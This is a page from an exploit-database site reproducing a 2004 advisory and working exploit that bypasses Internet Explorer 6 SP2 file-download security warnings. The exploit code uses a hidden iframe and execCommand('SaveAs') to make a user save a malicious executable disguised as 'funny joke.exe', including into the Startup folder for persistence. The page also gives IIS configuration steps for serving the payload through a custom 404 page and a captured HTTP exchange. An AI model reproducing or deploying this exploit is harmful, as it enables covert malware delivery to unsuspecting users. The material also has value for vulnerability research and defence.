0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
MS Internet Explorer 6.0 SP2 File Download Security Warning Bypass
================================================================== MS Internet Explorer 6.0 SP2 File Download Security Warning Bypass ================================================================== Orginal Advisory and exploit by cyber_flash (Vengy) Circumvent Windows XP SP2 security features using execCommand 'SaveAs' function! Demonstration: Notice that you don't receive any warning messages such as: "File Download - Security Warning" or "Open File - Security Warning". If "Hide file extensions for known file types" (Tools->Folder Options...->View) is enabled, (ie., 'funny joke.exe' appears as 'funny joke') it's possible to trick a user into downloading a malicious executable file masquerading as an html document! Windows XP SP2 normally prevents direct downloading. For example: calc.exe Description: When your browser cannot locate the URL that you entered in the address bar, you will receive a 404 error message telling you that the file was not found. This exploit utilizes a custom HTTP 404 error message (v.exe) and feeds that eventually to the execCommand Method. User input is required because the method always prompts a "Save HTML Document" dialog. 1. Bypasses the "File Download - Security Warning". Each time you click a download link, WinXP pops up a "File Download- Security Warning", making you aware that Windows is downloading a program and asking for your permission to complete the download process. 2. Bypasses the "Open File - Security Warning". Launching a downloaded executable that originates from an untrusted location (zone) such as the Internet also brings up a "Open File - Security Warning" that asks for permission to install the file in case it's dangerous. The execCommand Method: Executes a command on the current document. One of the many parameters of this method is the SaveAs Command which saves the current Web page to a local file. The SaveAs Command has the following format: document.execCommand('SaveAs','1','Name of the webpage.htm'); Platforms Tested: * Microsoft Windows 2000 Server * Microsoft Windows XP Professional (IIS V5.1) * Internet Explorer Version: 6 * NOT tested on Windows 2003 Server. Exploit: The following code requires no special server setup, and should work from any webpage that IE 6.0 fetches: <html> <body> <iframe src='http://your.domain.com/v.exe?.htm' name="NotFound" width="0" height="0"></iframe> Click <a href=# onclick="javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny joke.exe');">here</a>. </body> </html> Also, here's an example that requires modifying the IIS Error Mapping Properties (see below): <html> <body> <iframe src='vengy404.htm' name="NotFound" width="0" height="0"></iframe> Click <a href=# onclick="javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny joke.exe');">here</a>. </body> </html> NOTE: Using 'C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\funny joke.exe' will place the file into the users Startup folder! The file v.exe (replace it with any file you like) within the IFRAME src attribute will be delivered to the user upon saving. Steps to configure IIS: Launch Internet Information Services manager. Under the 'Custom Errors' tab, modify the Error Mapping Properties as follows: 1. Error Code: 404 2. Default Text: Not Found 3. Message Type: URL 4. URL: /v.exe (name of the executable which you'd like to send to the user. ;) Within the HTML page, insert an IFRAME as follows: <iframe src='vengy404.htm' name="NotFound" width="0" height="0"></iframe> The file 'vengy404.htm' intentionally doesn't exist on the server, so it'll trigger a 404 error message as defined above. But, the javascript code below references the stealthy v.exe data within the frame 'NotFound' and is piped to 'funny joke.exe' when prompted to save the file: javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny joke.exe'); Follow TCP Stream: Here's what occurs internally when fetching the exploit webpage plus the 404 error message (v.exe). GET /// HTTP/1.1 Accept: */* Accept-Language: en-us Accept-Encoding: gzip, deflate If-Modified-Since: Tue, 16 Nov 2004 02:34:44 GMT If-None-Match: "7e5914d584cbc41:10d2" User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: insecure.hopto.org:53 Connection: Keep-Alive HTTP/1.1 304 Not Modified Server: Microsoft-IIS/5.1 Date: Tue, 16 Nov 2004 12:31:00 GMT Content-Location: http://insecure.hopto.org:53/index.htm ETag: "7e5914d584cbc41:10d2" Content-Length: 0 GET ///vengy404.htm HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: insecure.hopto.org:53 Connection: Keep-Alive HTTP/1.1 200 OK Server: Microsoft-IIS/5.1 Cache-Control: no-cache,no-transform Expires: Tue, 16 Nov 2004 12:31:00 GMT Content-Location: http://insecure.hopto.org:53/v.exe?404;http://insecure.hopto.org///vengy404.htm Vary: * Date: Tue, 16 Nov 2004 12:31:00 GMT Content-Type: application/octet-stream Accept-Ranges: bytes Content-Length: 91408 <---V.EXE binary data goes here ---> Conclusion: Overall IE attempts to intercept risky code and prompts a security warning message, but it seems to allow custom HTTP errors to filter thru those security checks. Also, by creating a 404 .lnk shortcut file with a hotkey of 'Enter', saving it to the desktop installs a global hotkey, so it may be possible to execute the downloaded file by simply forcing the user to press the Enter key "alert('Thanks. Press Return')". Funny and scary how a few well placed characters <iframe src='v.exe?.htm' .... can confuse the IE monster, whereas specifying <iframe src='v.exe' .... is handled correctly - wow! Combined with existing exploits, it may be possible to save the data locally without user interaction? Anyhow, I'm positive there are many hidden exploits out there which are used to gain entry into our PC's regardless of how many patches M$ might supply. Geez, my computer is probably owned right now ... ahhhh... # 0day.today [2024-12-25] #